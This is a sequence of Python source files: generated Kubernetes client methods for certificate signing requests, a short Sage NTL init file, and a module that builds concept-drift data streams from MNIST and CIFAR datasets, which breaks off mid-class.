del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_certificates_v1alpha1_certificate_signing_request`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_certificates_v1alpha1_certificate_signing_request`")
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/certificatesigningrequests/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1CertificateSigningRequest',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def read_certificates_v1alpha1_certificate_signing_request(self, name, **kwargs):
"""
read the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_certificates_v1alpha1_certificate_signing_request(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'.
:param bool export: Should this value be exported. Export strips fields that a user cannot specify.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.read_certificates_v1alpha1_certificate_signing_request_with_http_info(name, **kwargs)
else:
(data) = self.read_certificates_v1alpha1_certificate_signing_request_with_http_info(name, **kwargs)
return data
def read_certificates_v1alpha1_certificate_signing_request_with_http_info(self, name, **kwargs):
"""
read the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_certificates_v1alpha1_certificate_signing_request_with_http_info(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
        :param bool export: Should this value be exported. Export strips fields that a user cannot specify.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'pretty', 'exact', 'export']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_certificates_v1alpha1_certificate_signing_request" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_certificates_v1alpha1_certificate_signing_request`")
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/certificatesigningrequests/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'exact' in params:
query_params['exact'] = params['exact']
if 'export' in params:
query_params['export'] = params['export']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1CertificateSigningRequest',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def replace_certificates_v1alpha1_certificate_signing_request(self, name, body, **kwargs):
"""
replace the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_certificates_v1alpha1_certificate_signing_request(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param V1alpha1CertificateSigningRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.replace_certificates_v1alpha1_certificate_signing_request_with_http_info(name, body, **kwargs)
else:
            data = self.replace_certificates_v1alpha1_certificate_signing_request_with_http_info(name, body, **kwargs)
return data
def replace_certificates_v1alpha1_certificate_signing_request_with_http_info(self, name, body, **kwargs):
"""
replace the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_certificates_v1alpha1_certificate_signing_request_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param V1alpha1CertificateSigningRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_certificates_v1alpha1_certificate_signing_request" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_certificates_v1alpha1_certificate_signing_request`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_certificates_v1alpha1_certificate_signing_request`")
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/certificatesigningrequests/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1CertificateSigningRequest',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def replace_certificates_v1alpha1_certificate_signing_request_approval(self, body, name, **kwargs):
"""
replace approval of the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_certificates_v1alpha1_certificate_signing_request_approval(body, name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1alpha1CertificateSigningRequest body: (required)
:param str name: name of the CertificateSigningRequest (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.replace_certificates_v1alpha1_certificate_signing_request_approval_with_http_info(body, name, **kwargs)
else:
            data = self.replace_certificates_v1alpha1_certificate_signing_request_approval_with_http_info(body, name, **kwargs)
return data
def replace_certificates_v1alpha1_certificate_signing_request_approval_with_http_info(self, body, name, **kwargs):
"""
replace approval of the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_certificates_v1alpha1_certificate_signing_request_approval_with_http_info(body, name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1alpha1CertificateSigningRequest body: (required)
:param str name: name of the CertificateSigningRequest (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'name', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_certificates_v1alpha1_certificate_signing_request_approval" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_certificates_v1alpha1_certificate_signing_request_approval`")
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_certificates_v1alpha1_certificate_signing_request_approval`")
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/certificatesigningrequests/{name}/approval'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1CertificateSigningRequest',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def replace_certificates_v1alpha1_certificate_signing_request_status(self, body, name, **kwargs):
"""
replace status of the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_certificates_v1alpha1_certificate_signing_request_status(body, name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1alpha1CertificateSigningRequest body: (required)
:param str name: name of the CertificateSigningRequest (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.replace_certificates_v1alpha1_certificate_signing_request_status_with_http_info(body, name, **kwargs)
else:
            data = self.replace_certificates_v1alpha1_certificate_signing_request_status_with_http_info(body, name, **kwargs)
return data
def replace_certificates_v1alpha1_certificate_signing_request_status_with_http_info(self, body, name, **kwargs):
"""
replace status of the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_certificates_v1alpha1_certificate_signing_request_status_with_http_info(body, name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1alpha1CertificateSigningRequest body: (required)
:param str name: name of the CertificateSigningRequest (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'name', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_certificates_v1alpha1_certificate_signing_request_status" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_certificates_v1alpha1_certificate_signing_request_status`")
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_certificates_v1alpha1_certificate_signing_request_status`")
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/certificatesigningrequests/{name}/status'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1CertificateSigningRequest',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def watch_certificates_v1alpha1_certificate_signing_request(self, name, **kwargs):
"""
watch changes to an object of kind CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_certificates_v1alpha1_certificate_signing_request(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.watch_certificates_v1alpha1_certificate_signing_request_with_http_info(name, **kwargs)
else:
            data = self.watch_certificates_v1alpha1_certificate_signing_request_with_http_info(name, **kwargs)
return data
def watch_certificates_v1alpha1_certificate_signing_request_with_http_info(self, name, **kwargs):
"""
watch changes to an object of kind CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_certificates_v1alpha1_certificate_signing_request_with_http_info(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'field_selector', 'label_selector', 'pretty', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_certificates_v1alpha1_certificate_signing_request" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `watch_certificates_v1alpha1_certificate_signing_request`")
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/watch/certificatesigningrequests/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VersionedEvent',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def watch_certificates_v1alpha1_certificate_signing_request_list(self, **kwargs):
"""
watch individual changes to a list of CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_certificates_v1alpha1_certificate_signing_request_list(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.watch_certificates_v1alpha1_certificate_signing_request_list_with_http_info(**kwargs)
else:
            data = self.watch_certificates_v1alpha1_certificate_signing_request_list_with_http_info(**kwargs)
return data
def watch_certificates_v1alpha1_certificate_signing_request_list_with_http_info(self, **kwargs):
"""
watch individual changes to a list of CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_certificates_v1alpha1_certificate_signing_request_list_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['field_selector', 'label_selector', 'pretty', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_certificates_v1alpha1_certificate_signing_request_list" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/watch/certificatesigningrequests'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VersionedEvent',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
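The generated methods above all share one dispatch pattern: called without `callback` they block and return the deserialized response; called with a `callback` they return the request thread and deliver the response asynchronously. A minimal self-contained sketch of that pattern (the `call_api` helper here is illustrative, not the real client method):

```python
import threading

def call_api(result, callback=None):
    # With a callback, run asynchronously on a thread and return the thread.
    if callback is not None:
        t = threading.Thread(target=lambda: callback(result))
        t.start()
        return t
    # Without a callback, return the result synchronously.
    return result

# Synchronous call returns the data directly.
assert call_api("csr-object") == "csr-object"

# Asynchronous call returns the thread and delivers data via the callback.
received = []
thread = call_api("csr-object", callback=received.append)
thread.join()
assert received == ["csr-object"]
```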
# --- src/sage/libs/ntl/__init__.py (repo: switzel/sage, license: BSL-1.0) ---
from error import setup_NTL_error_callback
setup_NTL_error_callback()
# --- changeds/datastreams.py (repo: FlopsKa/StreamDatasets-1, license: MIT) ---
import os
import pandas as pd
from sklearn.preprocessing import LabelEncoder
from tensorflow import keras
import numpy as np
from skmultiflow.data import led_generator, random_rbf_generator
from changeds.abstract import ChangeStream, RegionalChangeStream, ClassificationStream, RandomOrderChangeStream
from changeds.helper import plot_change_region_2d, preprocess_hipe
class SortedMNIST(ChangeStream, RegionalChangeStream):
    def __init__(self, preprocess=None):
        # Load MNIST and flatten each 28x28 image into a 784-dimensional vector.
        (x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()
        x_train = np.reshape(x_train, newshape=(len(x_train), x_train.shape[1] * x_train.shape[2]))
        x_test = np.reshape(x_test, newshape=(len(x_test), x_test.shape[1] * x_test.shape[2]))
        x = np.vstack([x_train, x_test])
        y = np.hstack([y_train, y_test])
        # Sort by label so that every label boundary becomes a concept change.
        sorted_indices = np.argsort(y)
        x = x[sorted_indices]
        y = y[sorted_indices]
        if preprocess:
            x = preprocess(x)
        # A change point is any index whose label differs from its predecessor.
        self._change_points = np.diff(y, prepend=y[0]).astype(bool)
        super(SortedMNIST, self).__init__(data=x, y=y)
def id(self) -> str:
return "sMNIST"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
def plot_change_region(self, change_idx: int, binary_thresh: float, save: bool, path=None):
plot_change_region_2d(self, change_idx, binary_thresh, save, path)
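The `np.diff(y, prepend=y[0]).astype(bool)` idiom used by the sorted streams marks every index where the label differs from its predecessor; a quick illustration with a toy label array:

```python
import numpy as np

# After sorting by label, a "change" is any index where the label differs
# from the one before it; prepend=y[0] keeps the output the same length as y
# and guarantees the first index is never flagged.
y = np.array([0, 0, 1, 1, 1, 2])
change_points = np.diff(y, prepend=y[0]).astype(bool)
assert change_points.tolist() == [False, False, True, False, False, True]
```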
class RandomOrderMNIST(RandomOrderChangeStream):
def __init__(self, num_changes: int = 100, preprocess=None):
(x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()
x_train = np.reshape(x_train, newshape=(len(x_train), x_train.shape[1] * x_train.shape[2]))
x_test = np.reshape(x_test, newshape=(len(x_test), x_test.shape[1] * x_test.shape[2]))
x = np.vstack([x_train, x_test])
y = np.hstack([y_train, y_test])
data, y, change_points = RandomOrderChangeStream.create_changes(x, y, num_changes)
self._change_points = change_points
if preprocess:
data = preprocess(data)
super(RandomOrderMNIST, self).__init__(data=data, y=y)
def id(self) -> str:
return "MNIST"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
class SortedFashionMNIST(ChangeStream, RegionalChangeStream):
def __init__(self, preprocess=None):
(x_train, y_train), (x_test, y_test) = keras.datasets.fashion_mnist.load_data()
x_train = np.reshape(x_train, newshape=(len(x_train), x_train.shape[1] * x_train.shape[2]))
x_test = np.reshape(x_test, newshape=(len(x_test), x_test.shape[1] * x_test.shape[2]))
x = np.vstack([x_train, x_test])
y = np.hstack([y_train, y_test])
sorted_indices = np.argsort(y)
x = x[sorted_indices]
y = y[sorted_indices]
if preprocess:
x = preprocess(x)
self._change_points = np.diff(y, prepend=y[0]).astype(bool)
super(SortedFashionMNIST, self).__init__(data=x, y=y)
def id(self) -> str:
return "sFMNIST"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
def plot_change_region(self, change_idx: int, binary_thresh: float, save: bool, path=None):
plot_change_region_2d(self, change_idx, binary_thresh, save, path)
class RandomOrderFashionMNIST(RandomOrderChangeStream):
def __init__(self, num_changes: int = 100, preprocess=None):
(x_train, y_train), (x_test, y_test) = keras.datasets.fashion_mnist.load_data()
x_train = np.reshape(x_train, newshape=(len(x_train), x_train.shape[1] * x_train.shape[2]))
x_test = np.reshape(x_test, newshape=(len(x_test), x_test.shape[1] * x_test.shape[2]))
x = np.vstack([x_train, x_test])
y = np.hstack([y_train, y_test])
data, y, change_points = RandomOrderChangeStream.create_changes(x, y, num_changes)
self._change_points = change_points
if preprocess:
data = preprocess(data)
super(RandomOrderFashionMNIST, self).__init__(data=data, y=y)
def id(self) -> str:
return "FMNIST"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
class SortedCIFAR10(ChangeStream, RegionalChangeStream):
def __init__(self, preprocess=None):
(x_train, y_train), (x_test, y_test) = keras.datasets.cifar10.load_data()
x_train = x_train.dot([0.299, 0.587, 0.114])
x_test = x_test.dot([0.299, 0.587, 0.114])
x_train = np.reshape(x_train, newshape=(len(x_train), x_train.shape[1] * x_train.shape[2]))
x_test = np.reshape(x_test, newshape=(len(x_test), x_test.shape[1] * x_test.shape[2]))
x = np.vstack([x_train, x_test])
y = np.hstack([y_train.reshape(-1), y_test.reshape(-1)])
sorted_indices = np.argsort(y)
x = x[sorted_indices]
y = y[sorted_indices]
if preprocess:
x = preprocess(x)
self._change_points = np.diff(y, prepend=y[0]).astype(bool)
super(SortedCIFAR10, self).__init__(data=x, y=y)
def id(self) -> str:
return "sCIFAR"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
def plot_change_region(self, change_idx: int, binary_thresh: float, save: bool, path=None):
plot_change_region_2d(self, change_idx, binary_thresh, save, path)
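The CIFAR streams collapse RGB to grayscale via `x.dot([0.299, 0.587, 0.114])`, the standard ITU-R BT.601 luma weights. A small standalone sketch of that `dot` trick (toy 2x2 image, not CIFAR data):

```python
import numpy as np

# One 2x2 RGB "image": shape (height, width, channels)
img = np.array([[[255, 0, 0], [0, 255, 0]],
                [[0, 0, 255], [255, 255, 255]]], dtype=float)

# The BT.601 luma weights collapse the channel axis: (h, w, 3) -> (h, w)
gray = img.dot([0.299, 0.587, 0.114])
print(gray.shape)            # (2, 2)
print(round(gray[1, 1], 1))  # pure white -> 255.0
```

After this step each image is a 2-D array, so the subsequent `np.reshape` can flatten it into a single feature vector per sample.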
class RandomOrderCIFAR10(RandomOrderChangeStream):
def __init__(self, num_changes: int = 100, preprocess=None):
(x_train, y_train), (x_test, y_test) = keras.datasets.cifar10.load_data()
x_train = x_train.dot([0.299, 0.587, 0.114])
x_test = x_test.dot([0.299, 0.587, 0.114])
x_train = np.reshape(x_train, newshape=(len(x_train), x_train.shape[1] * x_train.shape[2]))
x_test = np.reshape(x_test, newshape=(len(x_test), x_test.shape[1] * x_test.shape[2]))
x = np.vstack([x_train, x_test])
y = np.hstack([y_train.reshape(-1), y_test.reshape(-1)])
data, y, change_points = RandomOrderChangeStream.create_changes(x, y, num_changes)
self._change_points = change_points
if preprocess:
data = preprocess(data)
super(RandomOrderCIFAR10, self).__init__(data=data, y=y)
def id(self) -> str:
return "CIFAR"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
class SortedCIFAR100(ChangeStream, RegionalChangeStream):
def __init__(self, preprocess=None):
(x_train, y_train), (x_test, y_test) = keras.datasets.cifar100.load_data()
x_train = x_train.dot([0.299, 0.587, 0.114])
x_test = x_test.dot([0.299, 0.587, 0.114])
x_train = np.reshape(x_train, newshape=(len(x_train), x_train.shape[1] * x_train.shape[2]))
x_test = np.reshape(x_test, newshape=(len(x_test), x_test.shape[1] * x_test.shape[2]))
x = np.vstack([x_train, x_test])
